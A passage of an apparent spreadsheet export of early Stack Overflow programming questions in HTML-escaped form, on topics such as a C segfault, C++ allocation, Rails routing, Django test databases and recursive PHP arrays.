	if(position &amp;gt;= strlen((*node).content)) return;
	struct Node newNode;
	newNode.child = (*node).child;
	(*node).child = &amp;amp;newNode;
	int length = (strlen((*node).content) - position);
	newNode.content = malloc(sizeof(char) * (length + 1));
	strncpy(newNode.content, (*node).content + sizeof(char) * position, length);
	newNode.content[length] = '\0';
	//int foo;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code compiles (gcc -Wall -o list list.c) and runs fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ ./list
first
second
i'm third
first
st
second
i'm third
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But if I uncomment &lt;code&gt;int foo&lt;/code&gt; at the end of &lt;code&gt;split_node&lt;/code&gt;, compile and run, I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ ./list
first
second
i'm third
first
st
Segmentation fault
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;gdb gives me this backtrace:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#0  0x91d6ae70 in strlen ()
#1  0x91dd3126 in puts ()
#2  0x00001f21 in print_list (node={child = 0xbcec815b, content = 0x8b000000 &amp;lt;Address 0x8b000000 out of bounds&amp;gt;}) at list.c:41
#3  0x00001f3c in print_list (node={child = 0x8fe0154b, content = 0x1ff6 "i'm third"}) at list.c:42
#4  0x00001f3c in print_list (node={child = 0xbffff568, content = 0x1fef "second"}) at list.c:42
#5  0x00001f3c in print_list (node={child = 0xbffff570, content = 0x1fe9 "first"}) at list.c:42
#6  0x00001ee0 in main () at list.c:33
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why would adding a variable definition cause a segfault? It appears to be smashing the content pointer of the newly created node. I'm confused; any help?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Two basic C++ questions about string literals and dynamic allocation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are these two equivalent?&lt;/p&gt;
&lt;p&gt;char * aString = "This is a string.";&lt;/p&gt;
&lt;p&gt;char aString[] = "This is a string.";&lt;/p&gt;
&lt;p&gt;From my understanding, C++ stores strings by their addresses, so the pointer is getting a valid address. I assume the strings are also stored as type char? But how does it know how much memory to allocate for the string? Normally, char arrays need their array size preset. I believe the [] type arrays are counted by the compiler before compilation. Is this what happens for the string literal pointer as well?&lt;/p&gt;
&lt;p&gt;On to my second question, what is the difference between these two:&lt;/p&gt;
&lt;p&gt;int someNumber;&lt;/p&gt;
&lt;p&gt;int * someNumber = new int;&lt;/p&gt;
&lt;p&gt;The second is supposed to be dynamic allocation. If I understand the concept right, it allocates the memory as soon as it reads the declaration. But what happens in the standard declaration? Basically, I need to understand how dynamic allocation is advantageous over standard declarations.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rails: how do you access RESTful helpers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to work through this &lt;a href="http://guides.rubyonrails.org/routing_outside_in.html"&gt;guide to Rails routing&lt;/a&gt;, but I got stuck in section &lt;a href="http://guides.rubyonrails.org/routing_outside_in.html#_urls_and_paths"&gt;3.3&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Creating a RESTful route will also make available a pile of helpers within your application&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;and then they list some helpers like &lt;code&gt;photos_url&lt;/code&gt;, &lt;code&gt;photos_path&lt;/code&gt;, etc.&lt;/p&gt;
&lt;p&gt;My questions:&lt;/p&gt;
&lt;p&gt;Where can I find the complete list of helpers that is "made available?"&lt;/p&gt;
&lt;p&gt;Is there a way to call the helpers in the console? I created an app, then opened up the console with &lt;code&gt;script/console&lt;/code&gt;. I tried to call one of the helpers on the console like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt; entries_url
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But got:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NameError: undefined local variable or method `entries_url' for #&amp;lt;Object:0x349a4&amp;gt;
    from (irb):8
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Mongrel hangs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running into a problem in a Rails application. 
After some hours, the application seems to start hanging, and I wasn't able to find where the problem was. There was nothing relevant in the log files, but when I tried to get the url from a browser nothing happened (like mongrel accept the request but wasn't able to respond).&lt;/p&gt;
&lt;p&gt;What do you think I can test to understand where the problem is? &lt;/p&gt;
&lt;p&gt;Thanks for your help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mysql select - how to retrieve a result for threaded/nested messages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating a threaded message board and I'm trying to keep it simple.  There's a message table, and then a replies table that has an 'reply_id' field that can be null to indicate a top level response, or a value that indicates a threaded response.&lt;/p&gt;
&lt;p&gt;I'm a bit confused on how to do a SELECT call on this type of table though?  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Reply
-id (every reply gets a unique id)
-message_id (the message it is replying to)
-reply_id (the id of the reply it may be replying to - for threading)
-reply
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know this can be a complex problem, especially for performance, but I'm really just looking for the most basic solution to this.&lt;/p&gt;
&lt;p&gt;thanks...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Array of structs and new / delete</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a struct like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Items 
{
private:
    struct item
    {
        unsigned int a, b, c;
    };
    item* items[MAX_ITEMS];
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Say I wanted to 'delete' an item, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;items[5] = NULL;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I created a new item on that same spot later:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;items[5] = new item;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would I still need to call &lt;code&gt;delete[]&lt;/code&gt; to clean this up? Or won't this be needed since bounds of array &lt;code&gt;items[]&lt;/code&gt; are known before compiling? &lt;/p&gt;
&lt;p&gt;Is setting that pointer to NULL valid or should I be calling delete there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to reverse a Unicode string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It was hinted in a &lt;a href="http://stackoverflow.com/questions/433525/choosing-asp-net-over-php-or-perl#433610"&gt;comment to an answer to this question&lt;/a&gt; that PHP can not reverse Unicode strings. &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;As for Unicode, it works in PHP
  because most apps process it as
  binary. Yes, PHP is 8-bit clean. Try
  the equivalent of this in PHP: perl
  -Mutf8 -e 'print scalar reverse("ã»ã’ã»ã’")' You will get garbage,
  not "ã’ã»ã’ã»". â€“ jrockway&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And unfortunately it is correct that PHPs unicode support atm is at best "lacking". This will &lt;a href="http://74.125.77.132/search?q=cache:X3t6LgxXRa0J:derickrethans.nl/files/php6-unicode.pdf+php6+unicode"&gt;hopefully change drastically with PHP6&lt;/a&gt;. &lt;/p&gt;
&lt;p&gt;PHPs &lt;a href="http://no2.php.net/manual/en/ref.mbstring.php"&gt;MultiByte functions&lt;/a&gt; does provide the basic functionality you need to deal with unicode, but it is inconsistent and does lack a lot of functions. One of these is a function to reverse a string.&lt;/p&gt;
&lt;p&gt;I of course wanted to reverse this text for no other reason then to figure out if it was possible. And I made a function to accomplish this enormous complex task of reversing this Unicode text, so you can relax a bit longer until PHP6.&lt;/p&gt;
&lt;p&gt;Test code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$enc = 'UTF-8';
$text = "ã»ã’ã»ã’";
$defaultEnc = mb_internal_encoding();
echo "Showing results with encoding $defaultEnc.\n\n";
$revNormal = strrev($text);
$revInt = mb_strrev($text);
$revEnc = mb_strrev($text, $enc);
echo "Original text is: $text .\n";
echo "Normal strrev output: " . $revNormal . ".\n";
echo "mb_strrev without encoding output: $revInt.\n";
echo "mb_strrev with encoding $enc output: $revEnc.\n";
if (mb_internal_encoding($enc)) {
    echo "\nSetting internal encoding to $enc from $defaultEnc.\n\n";
    $revNormal = strrev($text);
    $revInt = mb_strrev($text);
    $revEnc = mb_strrev($text, $enc);
    echo "Original text is: $text .\n";
    echo "Normal strrev output: " . $revNormal . ".\n";
    echo "mb_strrev without encoding output: $revInt.\n";
    echo "mb_strrev with encoding $enc output: $revEnc.\n";
} else {
    echo "\nCould not set internal encoding to $enc!\n";
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Extending XHTML</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm playing around with writing a jQuery plugin that uses an attribute to define form validation behavior (yes, I'm aware there's already a validation plugin; this is as much a learning exercise as something I'll be using). Ideally, I'd like to have something like this:&lt;/p&gt;
&lt;p&gt;Example 1 - input:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input id="name" type="text" v:onvalidate="return this.value.length &amp;gt; 0;" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Example 2 - wrapper:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div v:onvalidate="return $(this).find('[value]').length &amp;gt; 0;"&amp;gt;
   &amp;lt;input id="field1" type="text" /&amp;gt;
   &amp;lt;input id="field2" type="text" /&amp;gt;
   &amp;lt;input id="field3" type="text" /&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Example 3 - predefined:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input id="name" type="text" v:validation="not empty" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The goal here is to allow my jQuery code to figure out which elements need to be validated (this is already done) and still have the markup be valid XHTML, which is what I'm having a problem with. I'm fairly sure this will require a combination of both DTD and XML Schema, but I'm not really quite sure how exactly to execute.&lt;/p&gt;
&lt;p&gt;Based on &lt;a href="http://www.w3.org/TR/xhtml-modularization/dtd_developing.html#s_dev_attrs" rel="nofollow"&gt;this article&lt;/a&gt;, I've created the following DTD:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!ENTITY % XHTML1-formvalidation1
    PUBLIC  "-//W3C//DTD XHTML 1.1 +FormValidation 1.0//EN"
            "http://new.dandoes.net/DTD/FormValidation1.dtd" &amp;gt;
%XHTML1-formvalidation1;
&amp;lt;!ENTITY % Inlspecial.extra 
  "%div.qname; " &amp;gt;
&amp;lt;!ENTITY % xhmtl-model.mod
    SYSTEM "formvalidation-model-1.mod" &amp;gt;  
&amp;lt;!ENTITY % xhtml11.dtd
    PUBLIC  "-//W3C//DTD XHTML 1.1//EN"
            "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" &amp;gt;
%xhtml11.dtd;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And here is "formvalidation-model-1":&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!ATTLIST %div.qname;
    %onvalidation   CDATA   #IMPLIED
    %XHTML1-formvalidation1.xmlns.extra.attrib;
&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've never done DTD before, so I'm not even really exactly sure what I'm doing. When I run my page through the W3 XHTML validator, I get 80+ errors because it's getting duplicate definitions of all the XHTML elements. Am I at least on the right track? Any suggestions?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;
I removed this section from my custom DTD, because it turned out that it was actually self-referencing, and the code I got the template from was really for combining two DTDs into one, not appending specific items to one:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!ENTITY % XHTML1-formvalidation1
    PUBLIC  "-//W3C//DTD XHTML 1.1 +FormValidation 1.0//EN"
            "http://new.dandoes.net/DTD/FormValidation1.dtd" &amp;gt;
%XHTML1-formvalidation1;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I also removed this, because it wasn't validating, and didn't seem to be doing anything:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!ENTITY % Inlspecial.extra 
  "%div.qname; " &amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Additionally, I decided that since I'm only adding a handful of additional items, the separate files model recommended by W3 doesn't really seem that helpful, so I've put everything into the dtd file, the content of which is now this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!ATTLIST div onvalidate CDATA  #IMPLIED&amp;gt;
&amp;lt;!ENTITY % xhtml11.dtd
    PUBLIC  "-//W3C//DTD XHTML 1.1//EN"
            "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" &amp;gt;
%xhtml11.dtd;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So now, I'm not getting any DTD-related validation errors, but the onvalidate attribute still is not valid.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; I've ditched the DTD and added a schema: &lt;a href="http://schema.dandoes.net/FormValidation/1.0.xsd" rel="nofollow"&gt;http://schema.dandoes.net/FormValidation/1.0.xsd&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Using v:onvalidate appears to validate in Visual Studio, but the W3C service still doesn't like it.&lt;/p&gt;
&lt;p&gt;Here's a page where I'm using it so you can look at the source:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://new.dandoes.net/auth" rel="nofollow"&gt;http://new.dandoes.net/auth&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And here's the link to the w3c validation result:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://validator.w3.org/check?uri=http://new.dandoes.net/auth&amp;amp;charset=%28detect+automatically%29&amp;amp;doctype=Inline&amp;amp;group=0" rel="nofollow"&gt;http://validator.w3.org/check?uri=http://new.dandoes.net/auth&amp;amp;charset=(detect+automatically)&amp;amp;doctype=Inline&amp;amp;group=0&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Is this about as close as I'll be able to get with this, or am I still doing something wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In LINQ to SQL, how do you pass parts of a LINQ query into a function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to pass parts of a linq Query into a function? 
I want create a common interface for my DAL that always uses the same query interface.   For example, &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;List&amp;lt;T&amp;gt; Get(Join j, Where w, Select s){    
    return currentDataContext&amp;lt;T&amp;gt;.Join(j).Where(w).Select(s).ToList();    
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this sort of thing possible? I'm thinking it would be done with expression trees, but I haven't been able to find examples of it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>For Python support, what company would be best to get hosting from?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to be able to run WSGI apps but my current hosting restricts it. Does anybody know a company that can accommodate my requirements?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I create a interface and mock this class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this class called Table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Table
{
    public string Name
    {
        get
        {
            return this.wrapper.Eval(//some command); 
            //wrapper is pass in by the ctor and is a COM object.
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which is used in this class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Map
{
  public Map MapTable(Table table)
  {
     return new Map(table.Name);
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to test MapTable command, should I be mocking Table or should I mock the wrapper object that is used by the table object.&lt;/p&gt;
&lt;p&gt;I was thinking something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Test()
 {
   Mock&amp;lt;ITable&amp;gt; mocktable = new Mock&amp;lt;ITable&amp;gt;(//pass in the wrapper object);
   mocktable.ExpectGet(n =&amp;gt; n.Name).Returns("Hello World");
   ITable table = mocktable.object;
   Map mymap = Map.MapTable(table);
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would that be correct?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access sharepoint list data in SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to SharePoint development.  I have a list, this list has a column that is called &lt;code&gt;Todaysdate&lt;/code&gt;. This column needs to be updated daily to today's actual date and since it contains ~20,000 rows I am NOT going to update it manually everyday.  Because it's used in a calculation row.&lt;/p&gt;
&lt;p&gt;My question is can I just use SQL and update the rows in the UserData table that correspond to the &lt;code&gt;datetime&lt;/code&gt; column that I need?&lt;/p&gt;
&lt;p&gt;I can query the list of rows by something similar to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Select * from UserData where tp_ListID = 'GUID'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but the data contained in the column &lt;code&gt;datetime3&lt;/code&gt; is not just the &lt;code&gt;Todaysdate&lt;/code&gt; information.  How do I return just the &lt;code&gt;Todaysdate&lt;/code&gt; info?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cleaning up a database in django before every test method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;By default when Django runs against sqlite backend it creates a new in memory database for a test. That means for every class that derives from unittest.TestCase, I get a new database. Can this be changed so that it is cleared before every test method is run?&lt;/p&gt;
&lt;p&gt;Example: I am testing a manager class that provides additional abstraction on top of Django persistent objects. The code looks more-less like that&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class TestForManager(unittest.TestCase):
  def testAddingBlah(self):
    manager = Manager()
    self.assertEquals(manager.getBlahs(), 0)
    manager.addBlah(...)
    self.assertEquals(manager.getBlahs(), 1)
  def testAddingBlahInDifferentWay(self):
    manager = Manager()
    self.assertEquals(manager.getBlahs(), 0)
    manager.addBlahInDifferentWay(...)
    self.assertEquals(manager.getBlahs(), 1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, the first assertion of second test fails, because the state of the database is preserved between test calls and there already is an instance of &lt;code&gt;Blah&lt;/code&gt; in the database.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to collapse functions and sub-routines for Classic ASP in Visual Studio 2008?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to enabling collapsing of functions and sub-routines for Classic ASP in Visual Studio 2008?  I'm able to manually go through and specify blocks of code as collapsable, but it would save me a lot of time if there was a way to automatically do this.&lt;/p&gt;
&lt;p&gt;Otherwise, is there another IDE or text editor that you can think of that supports this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make a field in MySql auto-incrementing in PHPMyAdmin?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created a field in my table and set it as the index but I can't get it to increase on it s own when a new item is added. How do I do make it do this through PHPMyAdmin?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I check if my workstation is locked?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone help with code snippet for checking if the workstation is locked? I tried with getting the document.title, so that when the workstation is locked it returns blank for document.title. This is not working. &lt;/p&gt;
&lt;p&gt;I am encoding wscript in vbscript which is residing in HTML.&lt;/p&gt;
&lt;p&gt;Any help with Javascript is also fine. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to pass a flexible number of ids into a controller in Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to display a comparison page so user can compare the properties of several objects in my database. Any number of objects can be compared. I'd also like it to be bookmarkable (so a 'get').&lt;/p&gt;
&lt;p&gt;How should I structure my URL / route for the controller? &lt;/p&gt;
&lt;p&gt;Something like /foo_compare/1_5_22 where I split the ids into 1, 5 and 22 in the controller?&lt;/p&gt;
&lt;p&gt;Maybe /foo_compare/1/5/22, but how would I set up the route?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is a string property itself threadsafe?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;String's in C# are immutable and threadsafe. But what when you have a public getter property? Like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public String SampleProperty{
    get;
    private set;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we have two threads and the first is calling 'get' and the second is calling 'set' at the "same" time, what will happen?&lt;/p&gt;
&lt;p&gt;IMHO the set must made a lock to be thread-safe like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private string sampleField;
private object threadSafer = new object();
public String SampleProperty{
    get{ return this.sampleField; }
    private set{
        lock(threadSafer){
            sampleField = value;
        }
    }
 }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Printing from web applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you generate paper-prints from a web application?&lt;/p&gt;
&lt;p&gt;Specifically I am thinking about more complex paper documents like diplomas, invoices and contracts. Variable number of pages with frames, tables, logos and headers/footers.&lt;/p&gt;
&lt;p&gt;Today I use custom forms and CSS for certain things and iTextSharp for others (I work with asp.net and MS-SQL), but I think both approaches are time-consuming and hard to make consistent across different documents.&lt;/p&gt;
&lt;p&gt;Is there a better way to go about it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Transaction rollback and web services</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given an example of calling two web services methods from a session bean, what if an exception is thrown between the calls to two methods? In the case of not calling the web services the transaction will rollback and no harm done. However, the web service will not rollback. Of course, even with a single web service there is a problem. While this is a generic question I am interested in solutions having to do with EJB session beans.&lt;/p&gt;
&lt;p&gt;An easy and customized answer would be to add a special "rollback method" to the web service for each "real functionality" method. What I am asking for is some standardized way to do so.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to determine installed IIS version</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would the preferred way of programmatically determining which the currently installed version of Microsoft Internet Information Services (IIS) is?&lt;/p&gt;
&lt;p&gt;I know that it can be found by looking at the MajorVersion key in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters. &lt;/p&gt;
&lt;p&gt;Would this be the &lt;em&gt;recommended&lt;/em&gt; way of doing it, or is there any safer or more beautiful method available to a .NET developer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting start node in a umbraco website</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this content structure for a multi language site.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Content
&lt;ul&gt;
&lt;li&gt;Danish
&lt;ul&gt;
&lt;li&gt;Forside&lt;/li&gt;
&lt;li&gt;Om os&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;English
&lt;ul&gt;
&lt;li&gt;Frontpage&lt;/li&gt;
&lt;li&gt;About Us&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When I start the website it automatically starts in the Danish-node, but I want it to start in "Forside", and as for the english part of the side I want it to start in the node "Frontpage".&lt;/p&gt;
&lt;p&gt;The nodes "Danish" and "English" are page nodes as well, but are only there as a logical folder structure.&lt;/p&gt;
&lt;p&gt;Is there any way I can choose which content node my website should start at?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What would you consider good Eclipse support?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As part of my job, I'm employed to install and support development tools for the developers in the company. &lt;/p&gt;
&lt;p&gt;Eclipse is an IDE that a great deal of developers here use, but I don't actively support. With the huge range of plugins and quick release of new versions - I find it hard to keep on top of and would not be able (obviously) to support everything.&lt;/p&gt;
&lt;p&gt;I do have some experience in Eclipse, but as a developer - what would you consider good support from your workplace in terms of Eclipse?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP Arrays, appending depth of array item recursively to an array with the key of 'depth'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Per the example array at the very bottom, i want to be able to append the depth of each embedded array inside of the array. for example:&lt;/p&gt;
&lt;pre&gt;
    array (
      53 =&gt; 
      array (
        'title' =&gt; 'Home',
        'path' =&gt; '',
        'type' =&gt; '118',
        'pid' =&gt; 52,
        'hasChildren' =&gt; 0,
      ),
&lt;/pre&gt;
&lt;p&gt;Has a depth of one according to the sample array shown below so it should now look like this:&lt;/p&gt;
&lt;pre&gt;
    array (
      53 =&gt; 
      array (
        'title' =&gt; 'Home',
        'path' =&gt; '',
        'type' =&gt; '118',
        'pid' =&gt; 52,
        'hasChildren' =&gt; 0,
        'depth' =&gt; 1,
      ),
&lt;/pre&gt;
&lt;p&gt;and so on...&lt;/p&gt;
&lt;p&gt;All of the recursive array function attempts i have made are pretty embarrassing. However I have looked at RecursiveArrayIterator which has the getDepth function. I'm confused on how to append it to the current array... any help is VERY much appreciated, thank you.&lt;/p&gt;
&lt;pre&gt;
  array (
    'title' =&gt; 'Website Navigation',
    'path' =&gt; '',
    'type' =&gt; '115',
    'pid' =&gt; 0,
    'hasChildren' =&gt; 1,
    'children' =&gt; 
    array (
      53 =&gt; 
      array (
        'title' =&gt; 'Home',
        'path' =&gt; '',
        'type' =&gt; '118',
        'pid' =&gt; 52,
        'hasChildren' =&gt; 0,
      ),
      54 =&gt; 
      array (
        'title' =&gt; 'Features',
        'path' =&gt; 'features',
        'type' =&gt; '374',
        'pid' =&gt; 52,
        'hasChildren' =&gt; 1,
        'children' =&gt; 
        array (
          59 =&gt; 
          array (
            'title' =&gt; 'artistic',
            'path' =&gt; 'features/artistic',
            'type' =&gt; '374',
            'pid' =&gt; 54,
            'hasChildren' =&gt; 1,
            'children' =&gt; 
            array (
              63 =&gt; 
              array (
                'title' =&gt; 'galleries',
                'path' =&gt; 'features/artistic/galleries',
                'type' =&gt; '374',
                'pid' =&gt; 59,
                'hasChildren' =&gt; 1,
                'children' =&gt; 
                array (
                  65 =&gt; 
                  array (
                    'title' =&gt; 'graphics',
                    'path' =&gt; 'features/artistic/galleries/graphics',
                    'type' =&gt; '118',
                    'pid' =&gt; 63,
                    'hasChildren' =&gt; 0,
                  ),
                  67 =&gt; 
                  array (
                    'title' =&gt; 'mixed medium',
                    'path' =&gt; 'features/artistic/galleries/mixed-medium',
                    'type' =&gt; '118',
                    'pid' =&gt; 63,
                    'hasChildren' =&gt; 0,
                  ),
                  64 =&gt; 
                  array (
                    'title' =&gt; 'overview',
                    'path' =&gt; 'features/artistic/galleries',
                    'type' =&gt; '118',
                    'pid' =&gt; 63,
                    'hasChildren' =&gt; 0,
                  ),
                  68 =&gt; 
                  array (
                    'title' =&gt; 'photography',
                    'path' =&gt; 'features/artistic/galleries/photography',
                    'type' =&gt; '118',
                    'pid' =&gt; 63,
                    'hasChildren' =&gt; 0,
                  ),
                  66 =&gt; 
                  array (
                    'title' =&gt; 'traditional',
                    'path' =&gt; 'features/artistic/galleries/traditional',
                    'type' =&gt; '118',
                    'pid' =&gt; 63,
                    'hasChildren' =&gt; 0,
                  ),
                ),
              ),
              62 =&gt; 
              array (
                'title' =&gt; 'overview',
                'path' =&gt; 'features/artistic',
                'type' =&gt; '118',
                'pid' =&gt; 59,
                'hasChildren' =&gt; 0,
              ),
              69 =&gt; 
              array (
                'title' =&gt; 'tutorials',
                'path' =&gt; 'features/artistic/tutorials',
                'type' =&gt; '374',
                'pid' =&gt; 59,
                'hasChildren' =&gt; 1,
                'children' =&gt; 
                array (
                  71 =&gt; 
                  array (
                    'title' =&gt; 'by category',
                    'path' =&gt; 'features/artistic/tutorials/by-category/',
                    'type' =&gt; '118',
                    'pid' =&gt; 69,
                    'hasChildren' =&gt; 0,
                  ),
                  72 =&gt; 
                  array (
                    'title' =&gt; 'by date',
                    'path' =&gt; 'features/artistic/tutorials/by-date/',
                    'type' =&gt; '118',
                    'pid' =&gt; 69,
                    'hasChildren' =&gt; 0,
                  ),
                  70 =&gt; 
                  array (
                    'title' =&gt; 'overview',
                    'path' =&gt; 'features/artistic/tutorials',
                    'type' =&gt; '118',
                    'pid' =&gt; 69,
                    'hasChildren' =&gt; 0,
                  ),
                ),
              ),
            ),
          ),
          58 =&gt; 
          array (
            'title' =&gt; 'overview',
            'path' =&gt; 'features',
            'type' =&gt; '118',
            'pid' =&gt; 54,
            'hasChildren' =&gt; 0,
          ),
          61 =&gt; 
          array (
            'title' =&gt; 'projects / labs',
            'path' =&gt; 'features/projects-labs/',
            'type' =&gt; '374',
            'pid' =&gt; 54,
            'hasChildren' =&gt; 0,
          ),
          60 =&gt; 
          array (
            'title' =&gt; 'web development',
            'path' =&gt; 'features/web-development',
            'type' =&gt; '374',
            'pid' =&gt; 54,
            'hasChildren' =&gt; 1,
            'children' =&gt; 
            array (
              74 =&gt; 
              array (
                'title' =&gt; 'articles',
                'path' =&gt; 'features/web-development/articles/',
                'type' =&gt; '374',
                'pid' =&gt; 60,
                'hasChildren' =&gt; 0,
              ),
              73 =&gt; 
              array (
                'title' =&gt; 'overview',
                'path' =&gt; 'features/web-development',
                'type' =&gt; '118',
                'pid' =&gt; 60,
                'hasChildren' =&gt; 0,
              ),
              75 =&gt; 
              array (
                'title' =&gt; 'tutorials',
                'path' =&gt; 'features/web-development/tutorials',
                'type' =&gt; '374',
                'pid' =&gt; 60,
                'hasChildren' =&gt; 0,
              ),
            ),
          ),
        ),
      ),
      55 =&gt; 
      array (
        'title' =&gt; 'Activity',
        'path' =&gt; 'activity',
        'type' =&gt; '374',
        'pid' =&gt; 52,
        'hasChildren' =&gt; 0,
      ),
      56 =&gt; 
      array (
        'title' =&gt; 'Blog',
        'path' =&gt; 'blog',
        'type' =&gt; '374',
        'pid' =&gt; 52,
